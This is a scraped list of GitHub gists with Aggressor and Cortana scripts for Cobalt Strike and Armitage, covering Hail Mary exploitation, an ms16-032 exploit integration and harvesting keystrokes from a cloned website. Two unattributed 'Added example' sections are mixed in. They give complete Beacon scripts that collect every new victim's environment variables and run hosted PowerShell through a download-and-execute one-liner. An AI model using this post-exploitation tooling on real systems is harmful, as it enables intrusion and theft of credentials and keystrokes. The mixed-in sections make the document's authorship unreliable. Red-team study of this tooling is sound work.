Raphael rsmudge

@rsmudge
rsmudge / gist:6717127
Created September 26, 2013 17:02
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
sub exploitPorts {
local('$exploit %exploits $options $port');
foreach $exploit (modules("exploits")) {
$options = options("exploit", $exploit);
if ('RPORT' in $options) {
rsmudge / gist:6717164
Created September 26, 2013 17:04
Cortana Hail Mary / Find Attacks Example (taken from my development testing... not tested recently. This code was used in a highly stripped down version of Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
popup attacks {
item "&Find Attacks" {
spawn(&runFindAttacks);
}
item "&Hail Mary" {
rsmudge / irc.cna
Created February 19, 2016 16:24
Aggressor Script IRC Example
#
# Quick/Dirty IRC Library for use with Aggressor Script
# https://www.cobaltstrike.com/aggressor-script/index.html
#
# irc_close($handle);
sub irc_close {
println($1, "QUIT :Good bye!");
closef($1);
}
# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        # $2 is the raw ps output, one process per line: name, pid, ...
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }
        }
    }, $callback => $2));
}
rsmudge / getenv.cna
Last active December 11, 2019 19:45
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');
# request environment variables for every new Beacon that comes in.
on beacon_initial {
# ideally, we'd have a bshell that could take callbacks. We don't have
# this yet. Eventually though, we will.
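The getenv.cna preview stops right after the beacon_initial handler opens. The following is an added example in Aggressor Script (Sleep) of the pattern the comments describe; it is mine, not rsmudge's gist. It assumes that the output of a "shell set" task is delivered through the beacon_output event with the Beacon ID in $1 and the text in $2, and the names getenv and env for the helper and alias are my choices.

```sleep
# Added example: collect each new Beacon's environment with 'shell set'
# and keep the KEY=VALUE pairs in %bvars, keyed by Beacon ID.
global('%bvars');

# request environment variables for every new Beacon that comes in.
on beacon_initial {
    # $1 is the Beacon ID
    %bvars[$1] = %();
    bshell($1, "set");
}

# bshell has no callback, so catch the output here and keep every
# line that looks like KEY=VALUE (assumption: 'set' output arrives via beacon_output)
on beacon_output {
    local('$line $key $value');
    # $1 is the Beacon ID, $2 is the output text
    if (%bvars[$1] is $null) {
        return;
    }
    foreach $line (split("\n", $2)) {
        # cmd.exe output is CRLF terminated; drop the \r before matching
        $line = replace($line, '\r$', '');
        # variable names never contain '=', values may; ismatch anchors the whole line
        if ($line ismatch '([^=]+)=(.*)') {
            ($key, $value) = matched();
            %bvars[$1][lc($key)] = $value;
        }
    }
}

# getenv($bid, "USERNAME") returns the value or $null if not seen yet
sub getenv {
    return %bvars[$1][lc($2)];
}

# Beacon console helper: 'env' dumps what we have, 'env NAME' prints one value
alias env {
    local('$key');
    if ($2 ne "") {
        blog($1, "$2 = " . getenv($1, $2));
    }
    else {
        foreach $key (keys(%bvars[$1])) {
            blog($1, "$key = " . %bvars[$1][$key]);
        }
    }
}
```

Caveat: because the handler cannot tell which task produced a given chunk of output, any later shell output containing a KEY=VALUE line is also recorded. That is acceptable for a lookup table of environment values, but if you need exact provenance, record the time of the 'set' task and ignore output that arrives much later.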
rsmudge / getpidany.cna
Created May 2, 2016 16:30
Get PID of Any Process
# getanypid($bid, "name.exe", &callback);
sub getanypid {
    bps($1, lambda({
        local('$pid $name $entry');
        # $2 is the raw ps output, one process per line: name, pid, ...
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq $proc) {
                # $1 is our Beacon ID, $pid is the PID of $proc
                [$callback: $1, $proc, $pid];
            }
        }
    }, $proc => $2, $callback => $3));
}
rsmudge / bot.cna
Created June 15, 2016 15:38
Demonstration inversion-of-control using co-routines in Aggressor Script.
# demonstrate an example of inversion-of-control with Aggressor Script
#
# co-routine,
sub bot {
# run pwd and get the output.
bpwd($bid);
when("beacon_output_alt", $this);
yield;
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
rsmudge / ms16-032.cna
Created July 29, 2016 04:11
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {
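Both the oneliner.cna gist (which reached into internal APIs to host a script via Beacon) and the ms16-032.cna notes (which name the official &beacon_host_script API added in Cobalt Strike 3.4) describe the same workflow: host a long PowerShell script on Beacon's one-off web server and run it with a short one-liner that downloads from localhost. The following is an added example of that workflow using the public API; it is my code, not either gist. It assumes beacon_host_script($bid, $script) returns the one-liner as a string, and the alias name hostrun and the optional follow-on command are my choices.

```sleep
# Added example: host a local .ps1 through Beacon and run it with the
# localhost one-liner returned by beacon_host_script (Cobalt Strike 3.4+).

# read a whole file into a string
sub readfile {
    local('$handle $data');
    $handle = openf($1);
    $data = readb($handle, -1);
    closef($handle);
    return $data;
}

# usage from the Beacon console:
#   hostrun /path/to/script.ps1 [PowerShell command to run after it loads]
alias hostrun {
    local('$script $oneliner $command');
    # $1 is the Beacon ID, $2 the script path, $3 the optional command
    if ($2 eq "") {
        berror($1, "usage: hostrun /path/to/script.ps1 [command]");
        return;
    }
    if (!-exists $2) {
        berror($1, "could not find $2");
        return;
    }
    $script = readfile($2);

    # Beacon serves $script on 127.0.0.1 inside the target and hands back a
    # short download-and-IEX one-liner; the script's length no longer matters
    # because only the one-liner goes on the command line.
    $oneliner = beacon_host_script($1, $script);

    # append the follow-on command, if any, so it runs once the script is loaded
    $command = iff($3 ne "", $oneliner . "; " . $3, $oneliner);

    btask($1, "host " . getFileName($2) . " and run: " . $command);
    bpowershell($1, $command);
}
```

The hosted script never touches disk on the target and the listening port lives inside the Beacon process, so the only thing that crosses a length-constrained execution opportunity is the one-liner. The same mechanism is what the ms16-032 integration relies on to deliver its payload script.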
rsmudge / webkeystrokes.cna
Created August 10, 2016 19:44
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
# convert comma separated keystroke values into a string.
sub toString {
local('@temp');
@temp = split(",", $1);
shift(@temp);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
}